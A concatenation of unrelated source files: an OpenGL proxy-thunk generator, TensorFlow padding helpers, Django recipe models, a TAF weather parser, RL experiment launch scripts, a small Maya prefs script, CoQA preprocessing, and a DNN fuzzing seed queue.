glPixelStoref
glPixelStorei
glPixelTransferf
glPixelTransferi
glPixelZoom
glPointSize
glPolygonMode
glPolygonOffset
glPolygonStipple
glPopAttrib
glPopClientAttrib
glPopMatrix
glPopName
glPrioritizeTextures
glPushAttrib
glPushClientAttrib
glPushMatrix
glPushName
glRasterPos2d
glRasterPos2dv
glRasterPos2f
glRasterPos2fv
glRasterPos2i
glRasterPos2iv
glRasterPos2s
glRasterPos2sv
glRasterPos3d
glRasterPos3dv
glRasterPos3f
glRasterPos3fv
glRasterPos3i
glRasterPos3iv
glRasterPos3s
glRasterPos3sv
glRasterPos4d
glRasterPos4dv
glRasterPos4f
glRasterPos4fv
glRasterPos4i
glRasterPos4iv
glRasterPos4s
glRasterPos4sv
glReadBuffer
glReadPixels
glRectd
glRectdv
glRectf
glRectfv
glRecti
glRectiv
glRects
glRectsv
glRenderMode
glRotated
glRotatef
glScaled
glScalef
glScissor
glSelectBuffer
glShadeModel
glStencilFunc
glStencilMask
glStencilOp
glTexCoord1d
glTexCoord1dv
glTexCoord1f
glTexCoord1fv
glTexCoord1i
glTexCoord1iv
glTexCoord1s
glTexCoord1sv
glTexCoord2d
glTexCoord2dv
glTexCoord2f
glTexCoord2fv
glTexCoord2i
glTexCoord2iv
glTexCoord2s
glTexCoord2sv
glTexCoord3d
glTexCoord3dv
glTexCoord3f
glTexCoord3fv
glTexCoord3i
glTexCoord3iv
glTexCoord3s
glTexCoord3sv
glTexCoord4d
glTexCoord4dv
glTexCoord4f
glTexCoord4fv
glTexCoord4i
glTexCoord4iv
glTexCoord4s
glTexCoord4sv
glTexCoordPointer
glTexEnvf
glTexEnvfv
glTexEnvi
glTexEnviv
glTexGend
glTexGendv
glTexGenf
glTexGenfv
glTexGeni
glTexGeniv
glTexImage1D
glTexImage2D
glTexParameterf
glTexParameterfv
glTexParameteri
glTexParameteriv
glTexSubImage1D
glTexSubImage2D
glTranslated
glTranslatef
glVertex2d
glVertex2dv
glVertex2f
glVertex2fv
glVertex2i
glVertex2iv
glVertex2s
glVertex2sv
glVertex3d
glVertex3dv
glVertex3f
glVertex3fv
glVertex3i
glVertex3iv
glVertex3s
glVertex3sv
glVertex4d
glVertex4dv
glVertex4f
glVertex4fv
glVertex4i
glVertex4iv
glVertex4s
glVertex4sv
glVertexPointer
glViewport
wglChoosePixelFormat
wglCopyContext
wglCreateContext
wglCreateLayerContext
wglDeleteContext
wglDescribeLayerPlane
wglDescribePixelFormat
wglGetCurrentContext
wglGetCurrentDC
wglGetDefaultProcAddress
wglGetLayerPaletteEntries
wglGetPixelFormat
wglGetProcAddress
wglMakeCurrent
wglRealizeLayerPalette
wglSetLayerPaletteEntries
wglSetPixelFormat
wglShareLists
wglSwapBuffers
wglSwapLayerBuffers
wglSwapMultipleBuffers
wglUseFontBitmapsA
wglUseFontBitmapsW
wglUseFontOutlinesA
wglUseFontOutlinesW
""".split()
# Emit C source that lazily resolves every GL/WGL entry point listed in
# glfuncnames through a function-pointer table plus naked asm thunks.
print('#include "global.h"')
print("void *glFuncPointers[%i];" % len(glfuncnames))
print("""void InitGL()
{""")
# One GetProcAddress call per function, indexed by position in the list.
for f in enumerate(glfuncnames):
    print('    glFuncPointers[%i] = GetProcAddress(hgl, "%s");' % f)
print("}")
# The GLHOOK macro defines a naked thunk that jumps through the table,
# lazily calling InitGL the first time (when the pointer is still NULL).
print("""
#define GLHOOK(M_NUM, M_NAME) \\
void naked M_NAME() { \\
    __asm mov eax, glFuncPointers[M_NUM] \\
    __asm test eax, eax \\
    __asm jnz ok \\
    __asm push eax \\
    __asm call InitGL \\
    __asm pop eax \\
ok: __asm jmp eax \\
}
""")
for f in enumerate(glfuncnames):
    print('GLHOOK(%i, %s)' % f)
# Module-definition style alias lines, one per exported name.
for f in glfuncnames:
    print('%s=my%s' % (f, f))
# -*- coding: utf-8 -*-
"""Padding operations for cylindrical data.
@@wrap_pad
@@wrap
"""
from __future__ import division
import tensorflow as tf
from math import floor, ceil
def wrap_pad(tensor, wrap_padding, axis=(1, 2)):
    """Apply cylindrical wrapping to one axis and zero padding to another.

    By default, this wraps horizontally (axis 2) and pads vertically
    (axis 1). The axes can be set with the `axis` keyword, and the
    wrapping/padding amount with the `wrap_padding` keyword.

    Args:
        tensor: input tensor; rank must exceed both entries of `axis`.
        wrap_padding: a single int used for both amounts, or a
            (padding, wrapping) pair.
        axis: (pad_axis, wrap_axis) pair.

    Returns:
        The wrapped-then-padded tensor.

    Raises:
        ValueError: if either axis is out of range for the tensor rank.
        TypeError: if `wrap_padding` is neither an int nor a list/tuple.
    """
    rank = tensor.shape.ndims
    if axis[0] >= rank or axis[1] >= rank:
        raise ValueError(
            "Invalid axis for rank-{} tensor (axis={})".format(rank, axis)
        )
    # handle single-number wrap/pad input
    if isinstance(wrap_padding, (list, tuple)):
        padding = wrap_padding[0]
        wrapping = wrap_padding[1]
    elif isinstance(wrap_padding, int):
        wrapping = padding = wrap_padding
    else:
        # Previously fell through and raised a confusing NameError below.
        raise TypeError(
            "wrap_padding must be an int or a (padding, wrapping) "
            "sequence, got {!r}".format(wrap_padding)
        )
    # set padding dimensions; an odd amount is split as (floor, ceil)
    paddings = [[0, 0]] * rank
    paddings[axis[0]] = [floor(padding/2), ceil(padding/2)]
    return tf.pad(wrap(tensor, wrapping, axis=axis[1]), paddings, 'CONSTANT')
def wrap(tensor, wrapping, axis=2):
    """Wrap cylindrically, appending evenly to both sides.

    For odd wrapping amounts, the extra column is appended to the [-1] side.
    """
    rank = tensor.shape.ndims
    if axis >= rank:
        raise ValueError(
            "Invalid axis for rank-{} tensor (axis={})".format(rank, axis)
        )
    axis_len = tensor.shape.as_list()[axis]
    # Slice from the leading edge, to be pasted onto the trailing side.
    right_sizes = [-1] * rank
    right_sizes[axis] = ceil(wrapping/2)
    right_piece = tf.slice(tensor, [0] * rank, right_sizes)
    # Slice from the trailing edge, to be pasted onto the leading side.
    left_sizes = [-1] * rank
    left_sizes[axis] = floor(wrapping/2)
    left_starts = [0] * rank
    left_starts[axis] = axis_len - floor(wrapping/2)
    left_piece = tf.slice(tensor, left_starts, left_sizes)
    return tf.concat([left_piece, tensor, right_piece], axis=axis)
def unwrap(tensor, wrapping, axis=2):
    """Removes wrapping from an image.

    For odd wrapping amounts, this assumes an extra column on the [-1] side.
    """
    rank = tensor.shape.ndims
    if axis >= rank:
        raise ValueError(
            "Invalid axis for rank-{} tensor (axis={})".format(rank, axis)
        )
    # Keep everything except `wrapping` entries along `axis`, skipping
    # the floor(wrapping/2) columns that wrap() prepended.
    keep_sizes = [-1] * rank
    keep_sizes[axis] = tensor.shape.as_list()[axis] - wrapping
    keep_starts = [0] * rank
    keep_starts[axis] = floor(wrapping/2)
    return tf.slice(tensor, keep_starts, keep_sizes)
|
import uuid
import os
from django.db import models
from django.contrib.auth.models import AbstractBaseUser, BaseUserManager, \
PermissionsMixin
from django.conf import settings
def recipe_image_file_path(instance, filename):
    """Generate file path for new recipe image.

    Keeps the original extension but replaces the basename with a random
    UUID so uploaded files can never collide with each other.
    """
    extension = filename.split('.')[-1]
    unique_name = '{}.{}'.format(uuid.uuid4(), extension)
    return os.path.join('uploads', 'recipe', unique_name)
class UserManager(BaseUserManager):
    """Manager that creates users keyed by email rather than username."""

    def create_user(self, email, password=None, **extra_fields):
        """Creates and saves a new user"""
        if not email:
            raise ValueError('Users must have an email address')
        # self.model is the model class this manager is attached to;
        # BaseUserManager wires it up for us.
        new_user = self.model(email=self.normalize_email(email), **extra_fields)
        new_user.set_password(password)
        new_user.save(using=self._db)
        return new_user

    def create_superuser(self, email, password):
        """Creates and saves a new super user"""
        superuser = self.create_user(email, password)
        superuser.is_staff = True
        superuser.is_superuser = True
        superuser.save(using=self._db)
        return superuser
class User(AbstractBaseUser, PermissionsMixin):
    """Custom user model that supports using email instead of username"""
    email = models.EmailField(max_length=255, unique=True)
    name = models.CharField(max_length=255)
    is_active = models.BooleanField(default=True)
    is_staff = models.BooleanField(default=False)
    # We use UserManager() to manage objects for the User Model.
    # (cont) It's accessed by User.objects, so that the manager
    # (cont) can be aware of the model it is managing.
    objects = UserManager()
    # Authenticate with the email field instead of a username.
    USERNAME_FIELD = 'email'
class Tag(models.Model):
    """Tag to be used for a recipe"""
    name = models.CharField(max_length=255)
    """
    Generally speaking, it’s easiest to refer to the user model with the
    "AUTH_USER_MODEL" setting in code that’s executed at import time, however,
    it’s also possible to call "get_user_model()" while Django is importing
    models, so you could use "models.ForeignKey(get_user_model(), ...)".
    As the models are executed at import time, it's somehow easier (or maybe
    even faster) to use AUTH_USER_MODEL notation than using
    models.ForeignKey(get_user_model(), ...). But both of them works.
    """
    # Owning user; see the note above on AUTH_USER_MODEL vs get_user_model().
    user = models.ForeignKey(
        settings.AUTH_USER_MODEL,
        # This insures that whenever a user is deleted, all recipes related
        # (cont) to they are deleted as well.
        on_delete=models.CASCADE,
    )
    def __str__(self):
        return self.name
class Ingredient(models.Model):
    """Ingredient to be used in a recipe"""
    name = models.CharField(max_length=255)
    # Owning user; deleting the user cascades to their ingredients.
    user = models.ForeignKey(
        settings.AUTH_USER_MODEL,
        on_delete=models.CASCADE
    )
    def __str__(self):
        return self.name
class Recipe(models.Model):
    """Recipe object"""
    # Owning user; deleting the user cascades to their recipes.
    user = models.ForeignKey(
        settings.AUTH_USER_MODEL,
        on_delete=models.CASCADE
    )
    title = models.CharField(max_length=255)
    price = models.DecimalField(max_digits=5, decimal_places=2)
    time_minutes = models.IntegerField()
    # 'blank=True' sets the 'link' field automatically to a blank string
    # when it's not provided by the user. Doing this, if we wanna check
    # if the link is set, we'd only check if it's blank or not, not needing
    # to check if it's 'Null/None'.
    link = models.CharField(max_length=255, blank=True)
    ingredients = models.ManyToManyField('Ingredient')
    tags = models.ManyToManyField('Tag')
    # Optional image; uploaded files get a UUID name via the helper above.
    image = models.ImageField(null=True, upload_to=recipe_image_file_path)
    def __str__(self):
        return self.title
|
import re
import aviation_weather
from aviation_weather import exceptions
from aviation_weather.components import Component
class _ChangeGroup(Component):
    """Shared base for TAF change groups (BECMG/FM/PROB/TEMPO).

    Parses the common payload of a change group -- wind, visibility,
    weather groups, sky conditions, then trailing remarks -- consuming
    each recognised component from the raw string in turn.
    """
    def __init__(self, raw):
        # Wind is optional: on decode failure keep None and leave `raw` as-is.
        try:
            self.wind = aviation_weather.Wind(raw)
            raw = raw.replace(self.wind.raw, "")
        except exceptions.WindDecodeError:
            self.wind = None
        # Visibility is likewise optional.
        try:
            self.visibility = aviation_weather.Visibility(raw)
            raw = raw.replace(self.visibility.raw, "")
        except exceptions.VisibilityDecodeError:
            self.visibility = None
        r = raw.split()
        # Weather groups: consume tokens until one fails to parse (or we
        # run out); the failing token starts the next section.
        t = list()
        i = 0
        try:
            while True:
                t.append(aviation_weather.WeatherGroup(r[i]))
                i += 1
        except (exceptions.WeatherGroupDecodeError, IndexError):
            r = r[i:]
        self.weather_groups = tuple(t)
        # Sky conditions: same consume-until-failure scheme.
        t = list()
        i = 0
        try:
            while True:
                t.append(aviation_weather.SkyCondition(r[i]))
                i += 1
        except (exceptions.SkyConditionDecodeError, IndexError):
            r = r[i:]
        self.sky_conditions = tuple(t)
        # Remarks (Canadian TAFs seem to always end with remarks)
        self._remarks = None
        if r:
            try:
                self._remarks = aviation_weather.Remarks(" ".join(r))
            except exceptions.RemarksDecodeError as e:
                raise exceptions.ChangeGroupDecodeError from e
    @property
    def raw(self):
        # Reassemble the canonical text from the parsed components, in
        # the same order they were consumed.
        raw = ""
        if self.wind:
            raw += " %s" % self.wind.raw
        if self.visibility:
            raw += " %s" % self.visibility.raw
        for weather_group in self.weather_groups:
            raw += " %s" % weather_group.raw
        for sky_condition in self.sky_conditions:
            raw += " %s" % sky_condition.raw
        if self._remarks:
            raw += " %s" % self._remarks.raw
        if raw:
            return raw[1:]  # strip leading space
        else:
            return ""
# BECoMinG
class BecomingGroup(_ChangeGroup):
    """TAF BECMG group: conditions changing over a start/end window."""

    def __init__(self, raw):
        match = re.search(
            r"\bBECMG (?P<start_time>\d{4})/(?P<end_time>\d{4})\s(?P<remainder>.+)\b", raw)
        if match is None:
            raise exceptions.BecomingGroupDecodeError("BecomingGroup(%r) could not be parsed" % raw)
        # The window times are DDHH; append "00Z" to satisfy Time's format.
        self.start_time = aviation_weather.Time(str(match.group("start_time")) + "00Z")
        self.end_time = aviation_weather.Time(str(match.group("end_time")) + "00Z")
        try:
            super().__init__(match.group("remainder"))
        except exceptions.ChangeGroupDecodeError as e:
            raise exceptions.BecomingGroupDecodeError("BecomingGroup(%r) could not be parsed" % raw) from e

    @property
    def raw(self):
        # [:-3] drops the "00Z" suffix added during parsing.
        return "BECMG %(start_time)s/%(end_time)s %(super)s" % {
            "start_time": self.start_time.raw[:-3],
            "end_time": self.end_time.raw[:-3],
            "super": super().raw
        }
# FroM
class FromGroup(_ChangeGroup):
    """TAF FM group: conditions holding from a single point in time."""

    def __init__(self, raw):
        match = re.search(r"\bFM(?P<time>\d{6})\s(?P<remainder>.+)\b", raw)
        if match is None:
            raise exceptions.FromGroupDecodeError("FromGroup(%r) could not be parsed" % raw)
        # DDHHMM time; append the zone designator for Time's format.
        self.time = aviation_weather.Time(str(match.group("time")) + "Z")
        try:
            super().__init__(match.group("remainder"))
        except exceptions.ChangeGroupDecodeError as e:
            raise exceptions.FromGroupDecodeError("FromGroup(%r) could not be parsed" % raw) from e

    @property
    def raw(self):
        return "FM%(time)s %(super)s" % {
            "time": self.time.raw[:-1],  # -1 to remove the "Z"
            "super": super().raw
        }
# PROBability
class ProbabilityGroup(_ChangeGroup):
    """TAF PROBnn group: conditions with a stated percent probability.

    The time window and payload are optional -- a bare "PROBnn" is valid.
    """
    def __init__(self, raw):
        m = re.search(
            r"\bPROB(?P<probability>\d{2})(?P<data> (?P<start_time>\d{4})/(?P<end_time>\d{4})\s(?P<remainder>.+))?\b", raw)
        if not m:
            raise exceptions.ProbabilityGroupDecodeError("ProbabilityGroup(%r) could not be parsed" % raw)
        self.probability = int(m.group("probability"))
        # The window + payload is optional; without it we parse an empty
        # remainder (all components end up None/empty).
        if m.group("data"):
            start_time = str(m.group("start_time"))
            end_time = str(m.group("end_time"))
            self.start_time = aviation_weather.Time(start_time + "00Z")
            self.end_time = aviation_weather.Time(end_time + "00Z")
            remainder = m.group("remainder")
        else:
            self.start_time = None
            self.end_time = None
            remainder = ""
        try:
            super().__init__(remainder)
        except exceptions.ChangeGroupDecodeError as e:
            raise exceptions.ProbabilityGroupDecodeError("ProbabilityGroup(%r) could not be parsed" % raw) from e
    @property
    def raw(self):
        probability = "PROB%d" % self.probability
        # Emit the window and payload only when a window was parsed.
        if self.start_time and self.end_time:
            return "%(probability)s %(start_time)s/%(end_time)s %(super)s" % {
                "probability": probability,
                "start_time": self.start_time.raw[:-3],
                "end_time": self.end_time.raw[:-3],
                "super": super().raw
            }
        else:
            return probability
# TEMPOrary
class TemporaryGroup(_ChangeGroup):
    """TAF TEMPO group: temporary fluctuations within a start/end window."""

    def __init__(self, raw):
        match = re.search(r"\bTEMPO (?P<start_time>\d{4})/(?P<end_time>\d{4})\s(?P<remainder>.+)\b", raw)
        if match is None:
            raise exceptions.TemporaryGroupDecodeError("TemporaryGroup(%r) could not be parsed" % raw)
        # The window times are DDHH; append "00Z" to satisfy Time's format.
        self.start_time = aviation_weather.Time(str(match.group("start_time")) + "00Z")
        self.end_time = aviation_weather.Time(str(match.group("end_time")) + "00Z")
        try:
            super().__init__(match.group("remainder"))
        except exceptions.ChangeGroupDecodeError as e:
            raise exceptions.TemporaryGroupDecodeError("TemporaryGroup(%r) could not be parsed" % raw) from e

    @property
    def raw(self):
        # [:-3] drops the "00Z" suffix added during parsing.
        return "TEMPO %(start_time)s/%(end_time)s %(super)s" % {
            "start_time": self.start_time.raw[:-3],
            "end_time": self.end_time.raw[:-3],
            "super": super().raw
        }
|
# Experiment grid: print shell commands launching LFF (FourierMLP) SAC
# runs over several DeepMind-control environments, Fourier dims and seeds.
envs = [
    'dm.acrobot.swingup',
    'dm.cheetah.run',
    'dm.finger.turn_hard',
    'dm.walker.run',
    'dm.quadruped.run',
    'dm.quadruped.walk',
    'dm.hopper.hop',
]
# Per-environment training budget, aligned with `envs` by index.
times = [
    1e6, 1e6, 1e6, 1e6, 2e6, 2e6, 1e6
]
sigma = 0.001
f_dims = [1024, 512, 256, 128, 64]
lr = '1e-4'
count = 0
for env_index, env in enumerate(envs):
    base_str = (f"python main.py --policy PytorchSAC --env {env} --start_timesteps 5000"
                f" --hidden_dim 1024 --batch_size 1024 --n_hidden 2 --lr {lr}")
    max_timesteps = int(times[env_index])
    # LFF sweep: every Fourier dimension crossed with three seeds.
    commands = [
        base_str + f' --network_class FourierMLP --concatenate_fourier --train_B'
                   f' --sigma {sigma} --fourier_dim {fourier_dim} --seed {seed}'
        for fourier_dim in f_dims
        for seed in [10, 20, 30]
    ]
    for command in commands:
        count += 1
        print(f'CUDA_VISIBLE_DEVICES=0 taskset -c a-b {command} --max_timesteps {max_timesteps} &')
        # Progress marker every ten launched jobs.
        if count % 10 == 0:
            print(count)
print(count)
# ablation_envs = []
|
# Read two whitespace-separated integer collections (each preceded by a
# count line we validate but ignore) and print the size of their union.
int(input())  # first count, unused
first = {int(token) for token in input().split()}
int(input())  # second count, unused
second = {int(token) for token in input().split()}
print(len(first | second))
#!python2.7
# -*- coding: utf-8 -*-
import maya.cmds as cmds
import maya.utils
import sys
sys.dont_write_bytecode = True
def setPref():
    # Disable the parallel evaluation manager and the VP2 GPU override
    # preference, then persist the preference change.
    cmds.evaluationManager(mode = "off")
    cmds.optionVar(intValue = ["gpuOverride",0])
    cmds.savePrefs(general =True)
# Run once Maya finishes initializing, when prefs are safe to modify.
maya.utils.executeDeferred(setPref)
# SQuAD data preprocessing.
# Prerequisite: a CoreNLP server running (from Tools/core...), started with:
# java -mx4g -cp "*" edu.stanford.nlp.pipeline.StanfordCoreNLPServer -port 9000 -timeout 15000
import os
import sys
sys.path.append("../")
import json
import gzip
import pandas as pd
import numpy as np
from tqdm import tqdm
from nltk.tokenize import word_tokenize,sent_tokenize
import pickle
import collections
from func.tf_idf import tf_idf
from func.corenlp import CoreNLP
def head_find(tgt):
    """Return the first question head-word present in *tgt*, or "<none>".

    Priority follows the order of the candidate list (wh-words first,
    then auxiliary verbs).
    """
    q_head = ["what", "how", "who", "when", "which", "where", "why", "whose",
              "whom", "is", "are", "was", "were", "do", "did", "does"]
    tokens = word_tokenize(tgt)
    for candidate in q_head:
        if candidate in tokens:
            return candidate
    return "<none>"
def modify(sentence, question_interro):
    """Append the interrogative phrase to *sentence* behind an 'interro_tag'
    marker, producing the model's tagged input string."""
    return " ".join([sentence, "interro_tag", question_interro])
def modify_history(history, now):
    """Concatenate the running dialogue *history* with the current utterance
    *now*, separated by a 'history_append_tag' marker token."""
    return " ".join([history, "history_append_tag", now])
def history_maker(neg_interro, question_interro):
    """Build a distractor question: a random interrogative (different from the
    real question's first token) prepended to *neg_interro*.

    Args:
        neg_interro: the non-interrogative remainder of a question.
        question_interro: the real question's interrogative phrase; its first
            token is excluded from the random choice. Must be non-empty —
            an empty string would make split()[0] raise IndexError.

    Returns:
        The synthesized question string, e.g. "where <neg_interro>".
    """
    # Fix: the module never imports `random` at top level, so the original
    # raised NameError on first call. Import locally to keep the file's
    # top-level import block untouched.
    import random

    interro_list = ["what", "where", "who", "why", "which", "whom", "how", ""]
    while True:
        index = random.randrange(len(interro_list))
        if interro_list[index] != question_interro.split()[0]:
            break
    question = interro_list[index] + " " + neg_interro
    return question
def c2wpointer(context_text, context, answer_start, answer_end):
    """Convert character-level answer offsets to word-level indices.

    Args:
        context_text: the raw passage string.
        context: the passage tokens, in order of appearance in context_text.
        answer_start, answer_end: character offsets of the answer span.

    Returns:
        (start_word_index, end_word_index) into *context*.
    """
    # Record each token's (start_char, end_char) span, scanning left to right
    # so repeated tokens map to their correct occurrence.
    spans = []
    cursor = 0
    for token in context:
        begin = context_text.find(token, cursor)
        cursor = begin + len(token)
        spans.append((begin, cursor))

    answer_start_w = None
    answer_end_w = None
    for idx, (begin, end) in enumerate(spans):
        if answer_start_w is None and begin <= answer_start <= end:
            answer_start_w = idx
        if answer_end_w is None and begin <= answer_end <= end:
            answer_end_w = idx
    return answer_start_w, answer_end_w
# Tokenize a sentence into words, undoing NLTK's PTB-style quote conversion.
def tokenize(sent):
    """Return word tokens of *sent* with `` and '' normalized back to '"'."""
    tokens = []
    for token in word_tokenize(sent):
        tokens.append(token.replace('``', '"').replace("''", '"'))
    return tokens
# Sentence-split context_text and return the sentence(s) covering the
# character span answer_start..answer_end (same scan idea as c2wpointer).
def answer_find(context_text, answer_start, answer_end, answer_replace):
    """Return the sentence(s) of *context_text* containing the answer span.

    answer_replace is currently unused (the replacement strategy below is
    deliberately disabled — see the commented block).
    """
    context = sent_tokenize(context_text)
    sent_start_id = -1
    sent_end_id = -1
    # Character offset where each sentence begins; a sentence ends where the
    # next one starts (or at the end of the passage).
    start_id_list = [context_text.find(sent) for sent in context]
    end_id_list = [start_id_list[i+1] if i+1 != len(context) else len(context_text) for i, sent in enumerate(context)]
    for i, sent in enumerate(context):
        start_id = start_id_list[i]
        end_id = end_id_list[i]
        if start_id <= answer_start and answer_start <= end_id:
            sent_start_id = i
        if start_id <= answer_end and answer_end <= end_id:
            sent_end_id = i
    # NOTE(review): leftover debug output — prints for every call.
    print(sent_start_id, sent_end_id)
    if sent_start_id == -1 or sent_end_id == -1:
        #sys.exit(-1)
        # NOTE(review): on failure this only prints and then slices with -1
        # indices, silently returning a wrong sentence — confirm intent.
        print("error")
        #sys.exit(-1)
    answer_sent = " ".join(context[sent_start_id:sent_end_id+1])
    # Replacing the answer inside the text was considered but disabled: it is
    # unsafe when tokenization drops punctuation such as the final period.
    """
    if answer_replace:
        context_text=context_text.replace(context[answer_start:answer_end],"<answer_word>")
        answer_sent=sent_tokenize(context_text)[sent_start_id]
    """
    return answer_sent
def data_process(input_path, out_path):
    """Extract the interrogative phrase of every CoQA question via CoreNLP.

    Reads the CoQA json at *input_path* and writes a json list to *out_path*
    with one record per question: {"interro", "noninterro", "vb_check"}.
    """
    with open(input_path, "r") as f:
        data = json.load(f)
    # NOTE(review): the accumulators below are never appended to or read in
    # this function — presumably leftovers from an earlier pipeline version.
    contexts = []
    questions = []
    answer_starts = []
    answer_ends = []
    answer_texts = []
    answers = []
    sentences = []
    ids = []
    dump_data = []
    corenlp = CoreNLP()
    for paragraph in tqdm(data["data"]):
        context_text = paragraph["story"].lower()
        question_history = []
        interro_history = []  # NOTE(review): never populated
        for i in range(len(paragraph["questions"])):
            question_dict = paragraph["questions"][i]
            answer_dict = paragraph["answers"][i]
            question_text = question_dict["input_text"].lower()
            answer_text = answer_dict["input_text"].lower()
            question_history.append(question_text)
            # Span fields are read but unused here (kept for schema validation?).
            span_start = answer_dict["span_start"]
            span_end = answer_dict["span_end"]
            span_text = answer_dict["span_text"]
            turn_id = paragraph["questions"][i]["turn_id"]
            # CoreNLP splits the question into interrogative phrase, remainder,
            # and a verb-presence flag (see func.corenlp.CoreNLP).
            interro, non_interro, vb_check = corenlp.forward_verbcheck(question_text)
            # Normalize the interrogative token list to a string ending in "?".
            if len(interro) == 0:
                interro = ""
            elif "?" in interro:
                interro = " ".join(interro)
            else:
                interro = " ".join(interro + ["?"])
            non_interro = " ".join(non_interro)
            dump_data.append({"interro": interro,
                              "noninterro": non_interro,
                              "vb_check": vb_check})
    with open(out_path, "w") as f:
        json.dump(dump_data, f, indent=4)
# main
# Pre-extract interrogative phrases from the CoQA json files using CoreNLP.
version = "1.1"  # NOTE(review): unused in this script
type = ""        # NOTE(review): unused, and shadows the builtin `type`
data_process(input_path="data/coqa-dev-v1.0.json",
             out_path="data/coqa-interro-dev.json"
             )
data_process(input_path="data/coqa-train-v1.0.json",
             out_path="data/coqa-interro-train.json"
             )
|
import time
import numpy as np
from random import randint
import tensorflow as tf
import datetime
import random
import os
class Seed(object):
    """Class representing a single element of a corpus."""

    def __init__(self, cl, coverage, root_seed, parent, metadata, ground_truth, l0_ref=0, linf_ref=0):
        """Inits the object.

        Args:
            cl: transformation state of this seed (mutation bookkeeping).
            coverage: a list to show the coverage.
            root_seed: the initial seed from which the current seed is
                sequentially mutated.
            parent: the seed this one was directly mutated from.
            metadata: the prediction result.
            ground_truth: the ground truth of the current seed.
            l0_ref, linf_ref: if the current seed is mutated from an affine
                transformation, the recorded L0/L_inf between the initial
                image and the reference image, i.e. L0(s_0,s_{j-1}) and
                L_inf(s_0,s_{j-1}) in Equation 2 of the paper.

        Returns:
            Initialized object.
        """
        self.clss = cl
        self.metadata = metadata
        self.parent = parent
        self.root_seed = root_seed
        self.coverage = coverage
        self.queue_time = None  # set when the seed is queued
        self.id = None          # assigned by the queue
        # The initial probability to select the current seed.
        self.probability = 0.8
        self.fuzzed_time = 0    # how many times this seed has been fuzzed
        self.ground_truth = ground_truth
        self.l0_ref = l0_ref
        self.linf_ref = linf_ref
class FuzzQueue(object):
    """Class that holds inputs and associated coverage.

    Maintains the seed corpus, an AFL-style coverage bitmap, several seed
    selection strategies, and run statistics/log files.
    """

    def __init__(self, outdir, is_random, sample_type, cov_num, criteria):
        """Init the class.

        Args:
            outdir: directory that receives plot.log / fuzz.log.
            is_random: truthy when running random testing (coverage ignored).
            sample_type: selection strategy name
                ('uniform' | 'tensorfuzz' | 'deeptest' | 'prob').
            cov_num: size of the coverage bitmap in entries.
            criteria: coverage-criteria name, used for log output only.
        """
        self.plot_file = open(os.path.join(outdir, 'plot.log'), 'a+')
        self.out_dir = outdir
        self.mutations_processed = 0
        self.queue = []
        self.sample_type = sample_type
        self.start_time = time.time()
        # whether it is random testing
        self.random = is_random
        self.criteria = criteria
        self.log_time = time.time()
        # Like AFL, it records the coverage of the seeds in the queue.
        # All bits start "virgin" (0xFF); bits are cleared as coverage is seen.
        self.virgin_bits = np.full(cov_num, 0xFF, dtype=np.uint8)
        # self.adv_bits = np.full(cov_num, 0xFF, dtype=np.uint8)
        self.uniq_crashes = 0
        self.total_queue = 0
        self.total_cov = cov_num
        # Some log information
        self.last_crash_time = self.start_time
        self.last_reg_time = self.start_time
        self.current_id = 0  # cursor for the round-robin 'prob' strategy
        self.seed_attacked = set()
        self.seed_attacked_first_time = dict()
        self.dry_run_cov = None
        # REG_MIN and REG_GAMMA are the p_min and gamma in Equation 3
        self.REG_GAMMA = 5
        self.REG_MIN = 0.3
        self.REG_INIT_PROB = 0.8

    def has_new_bits(self, seed):
        """AFL-style check: does seed.coverage touch any still-virgin bits?

        Side effect: clears those bits in the virgin map when it does.
        In random mode the result is always truthy.
        """
        temp = np.invert(seed.coverage, dtype = np.uint8)
        cur = np.bitwise_and(self.virgin_bits, temp)
        has_new = not np.array_equal(cur, self.virgin_bits)
        if has_new:
            # If the coverage is increased, we will update the coverage
            self.virgin_bits = cur
        return has_new or self.random

    def plot_log(self, id):
        # Plot the data during fuzzing, include: the current time, current iteration, length of queue, initial coverage,
        # total coverage, number of crashes, number of seeds that are attacked, number of mutations, mutation speed
        queue_len = len(self.queue)
        coverage = self.compute_cov()
        current_time = time.time()
        # NOTE(review): the first CSV column calls time.time() again instead of
        # reusing current_time — the two timestamps can differ slightly.
        self.plot_file.write(
            "%d,%d,%d,%s,%s,%d,%d,%s,%s\n" %
            (time.time(),
             id,
             queue_len,
             self.dry_run_cov,
             coverage,
             self.uniq_crashes,
             len(self.seed_attacked),
             self.mutations_processed,
             round(float(self.mutations_processed) / (current_time - self.start_time), 2)
             ))
        self.plot_file.flush()

    def write_logs(self):
        """Dump first-attack iterations per root seed and close log files."""
        log_file = open(os.path.join(self.out_dir, 'fuzz.log'), 'w+')
        for k in self.seed_attacked_first_time:
            log_file.write("%s:%s\n" % (k, self.seed_attacked_first_time[k]))
        log_file.close()
        self.plot_file.close()

    def log(self):
        """Emit a one-line progress summary via TensorFlow's logger.

        NOTE(review): tf.logging was removed in TensorFlow 2.x — this code
        assumes TF 1.x.
        """
        queue_len = len(self.queue)
        coverage = self.compute_cov()
        current_time = time.time()
        tf.logging.info(
            "Metrics %s | corpus_size %s | crashes_size %s | mutations_per_second: %s | total_exces %s | last new reg: %s | last new adv %s | coverage: %s -> %s%%",
            self.criteria,
            queue_len,
            self.uniq_crashes,
            round(float(self.mutations_processed)/(current_time - self.start_time), 2),
            self.mutations_processed,
            datetime.timedelta(seconds=(time.time() - self.last_reg_time)),
            datetime.timedelta(seconds=(time.time() - self.last_crash_time)),
            self.dry_run_cov,
            coverage
        )

    def compute_cov(self):
        # Compute the current coverage in the queue: percentage of bitmap
        # entries that are no longer fully virgin (!= 0xFF).
        coverage = round(float(self.total_cov - np.count_nonzero(self.virgin_bits == 0xFF)) * 100 / self.total_cov, 2)
        return str(coverage)

    def tensorfuzz(self):
        """Grabs new input from corpus according to sample_function."""
        # choice = self.sample_function(self)
        # TensorFuzz heuristic: sample from the 5 newest seeds plus one
        # uniformly random seed.
        corpus = self.queue
        reservoir = corpus[-5:] + [random.choice(corpus)]
        choice = random.choice(reservoir)
        return choice
        # return random.choice(self.queue)

    def select_next(self):
        # Different seed selection strategies (See details in Section 4)
        if self.random == 1 or self.sample_type == 'uniform':
            return self.random_select()
        elif self.sample_type == 'tensorfuzz':
            return self.tensorfuzz()
        elif self.sample_type == 'deeptest':
            return self.deeptest_next()
        elif self.sample_type == 'prob':
            return self.prob_next()

    def random_select(self):
        """Uniformly random seed selection."""
        return random.choice(self.queue)

    def deeptest_next(self):
        """DeepTest strategy: always fuzz the most recently queued seed."""
        choice = self.queue[-1]
        return choice

    def fuzzer_handler(self, iteration, cur_seed, bug_found, coverage_inc):
        # The handler after each iteration
